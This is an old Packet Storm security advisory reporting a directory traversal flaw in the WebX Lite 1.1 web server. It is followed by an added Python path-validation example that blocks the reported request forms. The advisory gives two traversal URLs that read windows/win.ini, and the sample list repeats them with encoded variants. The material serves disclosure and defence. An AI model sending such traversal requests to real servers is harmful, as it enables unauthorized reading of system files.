packetstorm | Dr. Insane | PACKETSTORM:31604
History: Sep 10, 2003 - 12:00 a.m.

WebX.txt

packetstormsecurity.com
`Hello,  
  
I am sending you a security advisory for WebX Lite 1.1 web server.  
  
----  
  
-=- Freedom of Voice - Freedom of Choice =-  
  
------------------------------------------------------------------  
http://members.lycos.co.uk/r34ct/ security advisory  
------------------------------------------------------------------  
  
  
dr_insane - [email protected]  
September 8, 2003  
  
  
  
Vulnerability:  
----------------  
1) Directory Traversal attacks  
  
Product:  
--------  
WebX Lite 1.1 web server  
WebX 1.1 web server  
  
Description of product:  
-----------------------  
Using WebX Lite could not be simpler. First set the basic parameters of a web server, choose the Server Port and the Virtual Path where your web pages are located. Then start the server. That is it.  
  
You can easily add web based administration/configuration, client access, and reporting features to existing applications while reusing existing subroutines, functions and classes. And the best part, you can do all this while still working in the development environment of your choice, whether it is Visual Basic, Visual C++, Delphi, or any environment that supports ActiveX controls.  
  
  
VULNERABILITY / EXPLOIT  
======================  
  
where to start...  
  
  
1) http://[target]/../../../../../../../../../../windows/win.ini  
2) http://[target]/.../.../.../.../.../.../.../windows/win.ini  
  
  
Local:  
------  
not really  
  
Remote:  
-------  
real bad  
  
  
  
Vendor Fix:  
-----------  
Not yet  
  
Vendor Contact:  
---------------  
http://www.futurewavetech.com/  
[email protected]  
  
  
Credits:  
--------  
dr_insane  
http://members.lycos.co.uk/r34ct/  
  
  
`
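
A server-side path check that refuses both request forms listed in the advisory, added here as an example (it is not code from the advisory or from WebX). It also covers percent-encoded and backslash variants, which go beyond the two forms shown; `DOC_ROOT`, `resolve_request_path`, `is_blocked` and the sample requests are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/srv/webroot"  # assumed document root (hypothetical, not from the advisory)

class TraversalError(ValueError):
    """Raised when a request path must not be served."""

def resolve_request_path(raw_path, root=DOC_ROOT):
    """Map a request path to a file path under root, or raise TraversalError."""
    decoded = raw_path
    for _ in range(3):                      # undo nested percent-encoding, bounded
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    else:
        raise TraversalError("path still changes after 3 decoding passes")
    decoded = decoded.replace("\\", "/")    # Windows accepts both separators
    segments = [s for s in decoded.split("/") if s]
    for seg in segments:
        # Rejects ".", "..", "..." and longer dot runs, including variants
        # padded with spaces, which Windows path handling may strip.
        if seg.strip(". ") == "":
            raise TraversalError("dot-only segment: %r" % seg)
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    # Defence in depth: result must stay under root (a real server also resolves symlinks).
    if posixpath.commonpath([root, candidate]) != root:
        raise TraversalError("resolved outside document root")
    return candidate

def is_blocked(raw_path):
    """True when the request would be refused."""
    try:
        resolve_request_path(raw_path)
        return False
    except TraversalError:
        return True

# Constructed sample requests: the first two are the forms given in the advisory.
SAMPLES = [
    "/../../../../../../../../../../windows/win.ini",
    "/.../.../.../.../.../.../.../windows/win.ini",
    "/%2e%2e/%2e%2e/windows/win.ini",
    "/..\\..\\windows\\win.ini",
    "/index.html",
]

if __name__ == "__main__":
    print({p: is_blocked(p) for p in SAMPLES})
```

The check is deliberately strict: a lone `.` segment is refused as well, since a static file server has no need to accept it.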